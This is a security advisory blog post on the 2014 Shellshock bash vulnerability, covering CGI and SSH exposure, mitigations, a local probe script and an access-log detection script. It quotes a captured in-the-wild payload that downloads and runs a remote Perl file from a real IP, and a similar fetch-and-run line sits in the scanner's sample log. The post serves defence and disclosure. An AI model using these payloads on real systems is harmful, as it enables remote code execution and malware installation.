Current event – v1.2 of post
This is a current event and as such this blog post is subject to change over the next few days as NCC Group's Cyber Defence Operations and Security Consulting divisions perform further research and analysis.
v1.2 – Link to the NCC Group North America subsidiary's analysis (here) and details of an active exploitation attempt detected by NCC Group.
v1.1 – Apple Mac OS X mitigation linked and details of a network appliance exploitation scenario.
v1.0 – initial version
Background
On 24 September CVE-2014-6271 was published together with a patch for bash (the default shell on most Linux systems). The bug is in the way bash imports function definitions from its environment: a variable whose value begins with "() {" is parsed as a function, and vulnerable versions also execute any commands that follow the closing brace. The risk therefore depends on where untrusted data can reach bash's environment. The use case of primary concern for Internet-facing infrastructure is CGI (Common Gateway Interface), because the web server copies request headers and the query string into environment variables before running the script, so a specially crafted request results in unauthorised command execution as the web server user.
Further detailed technical analysis is available from Michal Zalewski of Google and the Red Hat security team.
Affected Systems
Any system or product which uses CGI together with a vulnerable version of bash is potentially affected. Since BusyBox (whose ash shell does not share the bug) and other shells are not affected, NCC Group's current opinion, based on early analysis, is that the impact on smaller embedded systems should be lower; however, network appliances are already being identified as vulnerable.
Impact of Exploitation
There is a risk of unauthorised command execution on web sites which use CGI and on hosts which allow untrusted users some degree of restricted SSH access (a forced command is still run through the user's bash, with the client's requested command placed in the SSH_ORIGINAL_COMMAND environment variable). This is not the only scope, however; other systems may be affected in ways which are not immediately obvious.
We have seen examples of Linux-based network appliances being vulnerable, allowing arbitrary command execution as root on the underlying operating system via an authenticated administration web interface. Such exploitation undermines the integrity of the appliance going forward, because an attacker can perform actions the vendor never intended and which the restricted interface was designed to prevent.
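To make the CGI exposure described above concrete, here is an added example (it is not code from the original post or from NCC Group). It first probes the local bash with the well-known env x='() { :;}; echo ...' test, then emulates what a web server does before running a CGI script, copying a request header into an HTTP_USER_AGENT environment variable. The script name hello.cgi and the User-Agent strings are assumptions made for the example; on a patched bash the trailing command is ignored and only the script's own output appears.

```shell
#!/bin/sh
# Added example, not part of the original post: a local probe for
# CVE-2014-6271 and a minimal emulation of the CGI path that exposes it.
# The script name hello.cgi and the sample User-Agent values are assumptions.

# Print "vulnerable" if the bash on PATH executes commands appended to an
# exported function definition, "patched" if it does not, or "no-bash" if
# there is no bash to test. Exit status is 0 in all three cases.
shellshock_check() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
    # The variable value is a do-nothing function body followed by a
    # trailing command. A vulnerable bash runs "echo VULNERABLE" while
    # importing its environment, before it ever reaches the -c command.
    out=$(env x='() { :;}; echo VULNERABLE' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# Emulate what a web server does for a CGI script: each request header is
# copied into an HTTP_* environment variable and the script is then run with
# that environment. $1 is the client's User-Agent header. The script's
# stdout is printed so the caller can see whether the header's payload ran.
cgi_emulate() {
    ua=$1
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }
    dir=$(mktemp -d) || return 1
    # A hypothetical CGI script written in bash; any CGI that ends up invoking
    # bash (directly, or via system(), popen() or a shell-out) is in the same
    # position.
    cat > "$dir/hello.cgi" <<'EOF'
echo "Content-Type: text/plain"
echo
echo "hello from cgi"
EOF
    # Real servers set many more variables (QUERY_STRING, HTTP_COOKIE, ...);
    # only the attacker-controlled one matters for this demonstration.
    out=$(env -i PATH="$PATH" HTTP_USER_AGENT="$ua" bash "$dir/hello.cgi" 2>/dev/null)
    rm -rf "$dir"
    printf '%s\n' "$out"
}

# Demonstration when run directly with --demo: a benign header, then the
# classic test string supplied as a User-Agent.
if [ "${1-}" = "--demo" ]; then
    echo "local bash: $(shellshock_check)"
    cgi_emulate 'Mozilla/5.0 (X11; Linux x86_64)'
    cgi_emulate '() { :;}; echo PWNED-BY-USER-AGENT'
fi
```

Run it as sh probe.sh --demo on a host under test. A "vulnerable" result from the first line means the second cgi_emulate call prints PWNED-BY-USER-AGENT before the script's own output; the same plumbing applies to any CGI, in any language, that shells out to bash with the request environment intact.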
Recommendations to Customers
NCC Group recommends that customers should in the short term:
- Identify all Internet-exposed systems which use CGI technology, provide restricted SSH access or otherwise pass user-generated environment variables to scripts:
- Web servers
- Shell servers
- Embedded products
- Identify internal affected systems and products
- Work with vendors where required to have patches produced and support maintained
- Deploy one or more mitigations as detailed by the Red Hat team, including:
- mod_security or other Web Application Firewall rules
- IPTables rules
- Deploy protective monitoring signatures, either for commercial IDS / IPS solutions or as documented by Steven Adair for:
- Suricata
- Snort
- For very technical Mac OS X users, mitigation is documented on Stack Exchange and involves:
- Recompiling bash from source or installing it via MacPorts
Active Exploitation
NCC Group caught active exploitation by a spamming operation which used this payload:
() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur"
The perpetrator installed a Python script that sends phishing mails, but the recipient list contained only five email addresses, one of which was corrupt.
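The payload above, like every exploitation attempt for this bug, has to carry the exact prefix "() {" (bytes 28 29 20 7B) that bash tests for before treating an environment value as a function definition, and that is what the Snort, Suricata and IPTables rules in the recommendations key on. The following is an added example, not part of the original post or of those published rule sets: a small log scanner that applies the same marker to web server access logs and lists the source addresses for triage or blocking. The log lines are constructed for the example in Apache combined format using documentation address ranges, and the file name hello.cgi is an assumption.

```shell
#!/bin/sh
# Added example, not part of the original post or of the published Snort,
# Suricata or mod_security rules: scan web server access logs for the
# Shellshock marker those rules key on, the string "() {" in a
# client-supplied field, and list the source addresses. The log lines below
# are constructed, in Apache combined format, using documentation address
# ranges; the file name hello.cgi is an assumption.

SAMPLE_LOG=$(cat <<'EOF'
192.0.2.10 - - [25/Sep/2014:10:01:02 +0100] "GET /cgi-bin/hello.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.11 - - [25/Sep/2014:10:01:05 +0100] "GET /cgi-bin/hello.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://203.0.113.5/x;perl /tmp/x\""
198.51.100.7 - - [25/Sep/2014:10:02:11 +0100] "GET /cgi-bin/hello.cgi?q=%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" 200 512 "-" "curl/7.30.0"
192.0.2.12 - - [25/Sep/2014:10:03:30 +0100] "POST /login HTTP/1.1" 302 0 "http://example.com/" "Mozilla/5.0 (Windows NT 6.1)"
192.0.2.13 - - [25/Sep/2014:10:04:00 +0100] "GET /cgi-bin/hello.cgi HTTP/1.1" 200 512 "-" "(){ :;}; echo not-the-exact-marker"
EOF
)

# Print every line containing the marker, raw or percent-encoded. Reads the
# files named as arguments, or stdin when there are none. The spacing in
# "() {" is exact: that is the prefix bash tests for when deciding whether an
# environment value is a function definition, so a near miss such as
# "(){ :;}" is neither exploitable nor matched. The percent-encoded form is
# flagged as well, since a front end may decode it before it reaches the script.
shellshock_scan() {
    grep -E -i '\(\) [{]|%28%29%20%7B' "$@"
}

# Print the number of matching lines, 0 when there are none.
shellshock_count() {
    shellshock_scan "$@" | wc -l | tr -d ' '
}

# Print the distinct client addresses of matching requests, one per line,
# ready to feed into a block list.
shellshock_sources() {
    shellshock_scan "$@" | cut -d' ' -f1 | sort -u
}

# Write the constructed sample log to a temporary file and print its path.
sample_log_file() {
    f=$(mktemp) || return 1
    printf '%s\n' "$SAMPLE_LOG" > "$f"
    echo "$f"
}

# Demonstration when run directly with --demo.
if [ "${1-}" = "--demo" ]; then
    f=$(sample_log_file)
    echo "matches: $(shellshock_count "$f")"
    shellshock_sources "$f"
    rm -f "$f"
fi
```

Against the sample log this reports two matches (the raw User-Agent payload and the encoded query string) from 192.0.2.11 and 198.51.100.7; the near-miss line is correctly ignored. For a real deployment point the functions at the live log, for example shellshock_sources /var/log/apache2/access.log, and bear in mind that any header, not just User-Agent, becomes an environment variable, so the whole line must be searched rather than one field.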
Technical Analysis by NCC Group North America
NCC Group’s North America team, led by Tom Ritter, conducted analysis overnight and released a technical bulletin which can be found here. It examines:
- Impact Determining Exposure
- Patching
- The Imperfect Fix
- In The Wild Attacks
- IDS Signatures and Detection
Further Updates
As further information becomes available we will update this post during the day.
Related articles
Shellshock bug “could be bigger” than Heartbleed
Published date: 25 September 2014
Written by: Ollie Whitehouse